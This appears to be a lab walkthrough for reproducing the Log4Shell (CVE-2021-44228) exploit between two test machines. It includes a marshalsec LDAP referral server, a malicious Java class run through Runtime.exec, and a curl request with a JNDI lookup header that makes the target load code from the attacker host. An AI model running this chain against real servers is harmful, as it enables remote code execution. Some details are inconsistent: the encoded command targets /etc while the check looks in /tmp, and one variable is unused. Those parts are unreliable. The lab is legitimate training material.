Image

Installing Vulnerable Machine on the Ubuntu Machine (10.250.1.60)

I will be use these documents (https://github.com/christophetd/log4shell-vulnerable-app , https://github.com/mbechler/marshalsec and https://github.com/xiajun325/apache-log4j-rce-poc/ ) to build CVE-2021-44228 vulnerable machine and attacker machine. Firstly i am starting to install docker on that machine.

Docker İnstall On The Vulnerable Machine (10.250.1.60)

  • sudo apt update
  • sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
  • curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
  • sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
  • sudo apt update
  • sudo apt-get install docker-ce
  • docker --version
  • sudo systemctl start docker
  • sudo systemctl enable docker
  • sudo systemctl status docker

Image

Installing Vulnerable Machine (10.250.1.60)

  • cd /tmp
  • sudo git clone https://github.com/christophetd/log4shell-vulnerable-app
  • cd log4shell-vulnerable-app/
  • sudo docker build . -t vulnerable-app
  • sudo docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Image Image Image

Prepare Attacker Machine (10.250.1.61)

Install Java JDK On the Attacker Machine

  • cd /tmp
  • sudo apt update
  • sudo apt-get install default-jdk
  • wget http://mirrors.rootpei.com/jdk/jdk-8u181-linux-x64.tar.gz
  • tar zxvf jdk-8u181-linux-x64.tar.gz
  • sudo mv ./jdk1.8.0_181 /usr/lib/jvm
  • sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
  • sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
  • sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
  • sudo update-alternatives --config java choose the 1.8.0_181
  • sudo update-alternatives --config javac
  • sudo update-alternatives --config javaws
sudo vim /etc/environment

# PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/usr/lib/jvm/jdk1.8.0_181/bin:/usr/lib/jvm/jdk1.8.0_181/db/bin:/usr/lib/jvm/jdk1.8.0_181/jre/bin"
J2SDKDIR="/usr/lib/jvm/jdk1.8.0_181"
J2REDIR="/usr/lib/jvm/jdk1.8.0_181/jre*"
JAVA_HOME="/usr/lib/jvm/jdk1.8.0_181"
DERBY_HOME="/usr/lib/jvm/jdk1.8.0_181/db"

  • echo $JAVA_HOME

  • java -version

Image

Prepare LDAP Referrer Server on The Attacker

  • cd /tmp
  • sudo apt install maven
  • git clone https://github.com/mbechler/marshalsec
  • cd /tmp/marshalsec
  • sudo mvn clean package -DskipTests
  • java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.250.1.61:8000/#Log4jRCE"

Image

Prepare Malicious Java Code On The Attacker

  • mkdir /tmp/poc
  • cd /tmp/poc
vim Log4jRCE.java

public class Log4jRCE {

    static {
        try {
            String[] cmd = {"code"};
            Runtime.getRuntime().exec("touch /tmp/pwned").waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

  • javac Log4jRCE.java

  • sudo python3 -m http.server

Image

Exploit The Target Machine From The Attacker

Image

  • curl 10.250.1.60:8080 -H 'X-Api-Version: ${jndi:ldap://10.250.1.61:1389/Basic/Command/Base64/dG91Y2ggL2V0Yy9wd25lZDE=}'

Verify on the Victim Machine wheater code execution

  • sudo docker exec vulnerable-app ls /tmp

Image